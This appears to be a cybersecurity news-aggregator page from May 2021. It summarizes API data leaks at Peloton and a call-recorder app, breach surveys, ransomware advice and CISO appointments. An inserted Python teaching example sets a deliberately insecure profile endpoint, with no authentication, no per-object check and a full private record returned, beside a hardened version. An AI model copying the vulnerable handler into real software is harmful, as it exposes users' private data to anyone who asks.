News quickly spread about a vulnerable call recording app for iPhone named “Call Recorder,” or “Acr call recorder,” as its listing in the Apple App Store states. TechCrunch was the first outlet to flag a design flaw in the mobile application’s API when it obtained call recordings from AWS S3 cloud storage to prove the API was insecure and therefore open to API-based attacks. The weaknesses exhibited by the mobile app represent a significant shift occurring in cybersecurity towards the importance of protecting and hardening APIs. From this instance alone, we can learn a number of valuable lessons as API attacks are set to rise drastically this year. Most of the issues in the Call Recorder vulnerability map directly to the OWASP API Security Top 10, a list that captures the most common API mistakes. This document is a great reference for DevOps and security teams that are looking to implement strong API security that can be applied to both web and mobile application systems, including those in the cloud.



from Cyber Security News https://ift.tt/3vUHFrq

Friday, 7 May 2021

David Ting named CISO at Nylas

David Ting assumes the role of Chief Information Security Officer (CISO) at productivity infrastructure solutions provider Nylas.



from Cyber Security News https://ift.tt/2Rzo698

Peloton's API exposes riders' private data

Peloton’s leaky API allowed any hacker to obtain any user’s account data, even if that user had set their profile to private. The vulnerability, which was discovered by security research firm Pen Test Partners, allowed requests for Peloton user account data to go through without checking that the request was authenticated. As a result, the exposed API could let anyone access any Peloton user’s age, gender, city, weight, workout stats, and birthday.
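Both this Peloton flaw and the Call Recorder case above are instances of the first three items in the OWASP API Security Top 10 (2019): broken object level authorization, broken user authentication, and excessive data exposure. The example below is added here to illustrate that pattern and is not Peloton's or the app vendor's code; the endpoint shape, the user store, the HMAC bearer-token scheme and the field names are all constructed for the illustration, and the stated exposed fields are the only link to the article. It shows a handler with the described defect next to a hardened one.

```python
"""Vulnerable vs hardened user-profile endpoint (constructed example, stdlib only)."""
import hashlib
import hmac
import secrets

# Demo-only signing key for session tokens (assumption: a real deployment would use a
# managed, rotated secret or an established session/JWT library instead).
SECRET = secrets.token_bytes(32)

# Constructed user store; the fields mirror the ones the article says were exposed.
USERS = {
    101: {"username": "rider_a", "private": True,  "age": 34, "gender": "f",
          "city": "Denver", "weight": 70, "birthday": "1987-03-02"},
    102: {"username": "rider_b", "private": False, "age": 41, "gender": "m",
          "city": "Austin", "weight": 82, "birthday": "1980-11-19"},
}

# Fields a public profile is allowed to reveal to *other* authenticated users.
PUBLIC_FIELDS = {"username", "city"}


def issue_token(user_id):
    """Mint a bearer token 'uid.mac' bound to a user id (assumed scheme for the demo)."""
    mac = hmac.new(SECRET, str(user_id).encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"


def verify_token(token):
    """Return the caller's user id if the token's MAC is valid, else None."""
    if not token or "." not in token:
        return None
    uid, mac = token.rsplit(".", 1)
    expected = hmac.new(SECRET, uid.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):   # constant-time comparison
        return None
    return int(uid)


def _caller_from(request):
    header = request.get("headers", {}).get("Authorization", "")
    token = header[len("Bearer "):] if header.startswith("Bearer ") else ""
    return verify_token(token)


def get_user_vulnerable(request, user_id):
    """Shape of the described flaw: no authentication, no per-object check, full record."""
    user = USERS.get(user_id)
    return (200, dict(user)) if user else (404, {"error": "not found"})


def get_user_hardened(request, user_id):
    """Authenticate every request, then authorize per object, then minimize the response."""
    caller = _caller_from(request)
    if caller is None:
        return (401, {"error": "unauthenticated"})          # API2: broken user auth
    user = USERS.get(user_id)
    if user is None:
        return (404, {"error": "not found"})
    if caller == user_id:
        return (200, dict(user))                            # owner sees own full record
    if user["private"]:
        return (404, {"error": "not found"})                # API1: BOLA; do not confirm existence
    return (200, {k: v for k, v in user.items() if k in PUBLIC_FIELDS})  # API3: no excess data
```

Returning 404 rather than 403 for a private profile avoids turning the endpoint into an enumeration oracle; the hardened handler also never returns weight, birthday or gender to anyone but the account owner, so a future authorization bug would leak less.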

from Cyber Security News https://ift.tt/2SunjqB

Thursday, 6 May 2021

51% of organizations have experienced a data breach caused by a third-party

SecureLink and Ponemon Institute today released a new report titled “A Crisis in Third-party Remote Access Security”, revealing the alarming disconnect between an organization’s perceived third-party access threat and the security measures it employs. Findings revealed that organizations are not taking the necessary steps to reduce third-party remote access risk, and are exposing their networks to security and non-compliance risks. As a result, 44% of organizations have experienced a breach within the last 12 months, with 74% saying it was the result of giving too much privileged access to third parties.

from Cyber Security News https://ift.tt/3h4ykt7

Best practices during World Password Day

Thursday, May 6 is World Password Day, a day dedicated to promoting safer password practices. Strong password management has been especially important as cyberattacks have skyrocketed since the onset of the pandemic and the switch to remote work. As many employees continue to work from home, security is more important than ever, and passwords can be the first line of defense for computers, networks, and sensitive enterprise and personal information. Here, security executives share their insight and tips on how to create and promote safer password practices in the enterprise and among employees.



from Cyber Security News https://ift.tt/3h5z3tX

Financial services experienced 125% surge in exposure to mobile phishing attacks in 2020

Lookout, Inc. released a report showing that mobile phishing exposure doubled among financial services and insurance organizations between 2019 and 2020. The Lookout Financial Services Threat Report illustrates that these organizations were not immune to mobile phishing despite an increased adoption of mobile device management (MDM).

from Cyber Security News https://ift.tt/2QOXHV7

Wednesday, 5 May 2021

Inside look at the Genesis Market, a cybercriminal market

Digital Shadows released new research into the movement of cybercriminal marketplaces with a feature on Genesis market. According to the Digital Shadows Photon Research Team, Genesis is a high-profile and trusted repository of digital fingerprints that has grown in popularity since it was launched in beta in 2017. In 2020, Genesis commanded 65% of mentions across criminal forums for fingerprinting services. While other markets have come and gone, Genesis continues to endure and has grown year-on-year. In the last two months alone, more than 5,000 new listings have been added to Genesis, bringing the total number of listings to more than 350,000.

from Cyber Security News https://ift.tt/3uod9Wt

The top three collaboration security misses by CISOs

As we continue to embrace hybrid work, chief information security officers (CISOs) and compliance teams are wading through and in some cases even overlooking many different areas related to collaboration security. We’ve highlighted the top three areas of risk in this post which should keep CISOs awake at night. The remote workplace continues to evolve at lightning speed, and so too should CISOs – or risk sensitive materials ending up in the wrong hands.

from Cyber Security News https://ift.tt/3utthpS

Corporate boards are better at cybersecurity but still need improvement

While a number of useful countermeasures are being taken across corporate boards, progress remains relatively slow in the face of borderline existential threats. Not so long ago, companies thought of cybersecurity as a technology problem to be overseen by the chief security officer or the chief information officer, or as a compliance issue to be managed with audit functions. Today, thankfully, a more holistic, proactive and analytical approach is generally taken. There is more security training and better hygiene and most boards now count a seasoned CISO as one of their directors.



from Cyber Security News https://ift.tt/3xJ4joq

7 things every CISO must know about ransomware

Ransomware is one of the most prominent cybersecurity threats organizations face today. Any institution or company (small or large) can fall victim to ransomware, including schools, healthcare providers, educational facilities, non-profit entities, and government agencies. Cybercriminals that deploy ransomware attacks do not discriminate. Thankfully, there are ways to protect your organization from ransomware attacks. In this article, you’ll discover everything you need to know about ransomware as a chief information security officer (CISO), from its evolution to preventative measures.



from Cyber Security News https://ift.tt/3eXDqVh

Exploitation in the time of COVID

BlackBerry Limited released its 2021 BlackBerry Threat Report, detailing a sharp rise in cyberthreats facing organizations since the onset of COVID-19. The research shows a cybercrime industry which has not only adapted to new digital habits, but also become increasingly successful in finding and targeting vulnerable organizations.



from Cyber Security News https://ift.tt/33hYeBi

Tuesday, 4 May 2021

Why security has broken down—and what it means now

Life used to be simpler for security teams. In the legacy world, they had a clear understanding of the environment they needed to protect—typically the standard LAMP stack (Linux, Apache, MySQL, PHP). Within this straightforward, relatively static infrastructure, they could carve out a network layer all for themselves to implement the security technologies of their choice. They also had a direct line to vendors to discuss the security controls that needed to be implemented. But in the age of DevOps and cloud, things just don’t work this way anymore. Four key changes have left security teams struggling to protect applications and organizations.

from Cyber Security News https://ift.tt/3gYuh1r

Cybersecurity workforce minimally impacted by pandemic, but still grappling with persistent hiring challenges

The pandemic’s disruption has rippled across the globe, impacting workforces in nearly every sector. However, according to the findings from the State of Cybersecurity 2021 Part 1 survey report from ISACA in partnership with HCL Technologies, the cybersecurity workforce has largely been unscathed, though all-too-familiar challenges in hiring and retention continue at levels similar to years past.

from Cyber Security News https://ift.tt/3vAqQlm

Monday, 3 May 2021

Post-pandemic organizational resilience lies within supply chain, information security

In order to remain resilient and meet the emerging priorities around effective supplier management, improved business continuity planning, and increased community engagement, business leaders need to assess and benchmark their performance around three core areas of organizational resilience: operational resilience, supply chain resilience, and information resilience.

from Cyber Security News https://ift.tt/3vDsC5p

NSA releases cybersecurity advisory on ensuring security of operational technology

The National Security Agency (NSA) released the Cybersecurity Advisory, “Stop Malicious Cyber Activity Against Connected Operational Technology” , for National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) operational technology (OT) owners and operators. The CSA details how to evaluate risks to systems and improve the security of connections between OT and enterprise networks. Information technology (IT) exploitation can serve as a pivot point for OT exploitation, so carefully evaluating the risk of connectivity between IT and OT systems is necessary to ensure unique cybersecurity requirements are met.

from Cyber Security News https://ift.tt/2QK8lwo

Paul Suarez joins Casey's General Stores as CISO

Paul Suarez joins Casey's General Stores in the newly created Chief Information Security Officer position at the company, which operates 2,200 convenience stores across 16 states.



from Cyber Security News https://ift.tt/3nKhil2

Sunday, 2 May 2021

Zoom joins CVE program as a CVE Numbering Authority (CNA)

Zoom has joined the CVE Program as a CVE Numbering Authority (CNA). The CVE Program’s overall mission is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities that require third-party notification or coordination to fully remediate. Cybersecurity and IT professionals use CVE records to ensure they are discussing the same security issue, coordinate their efforts, and prioritize and address vulnerabilities. The program is an international, community-based effort and relies on the industry norms of the responsible and coordinated security community to discover vulnerabilities.



from Cyber Security News https://ift.tt/3aWZWMU

3 steps to promote a human-centric security awareness culture

Human error contributes to almost 95% of security breaches. Most security approaches still fail at making a desired impact. Let’s analyze the two main reasons why businesses fail to develop a robust, human-centric security approach.

from Cyber Security News https://ift.tt/3eb3KvL

Security Executive Council welcomes five new security experts

The Security Executive Council (SEC) has welcomed Tom Bello, Coral Gehring, Matthew Giese, Bill King, and Tom Mahlik to its faculty of esteemed security experts. SEC subject matter experts and emeritus faculty (former CSOs and CISOs) have excelled in their careers and are eager to transfer their knowledge and competencies to other security leaders.

from Cyber Security News https://ift.tt/2QO1CRW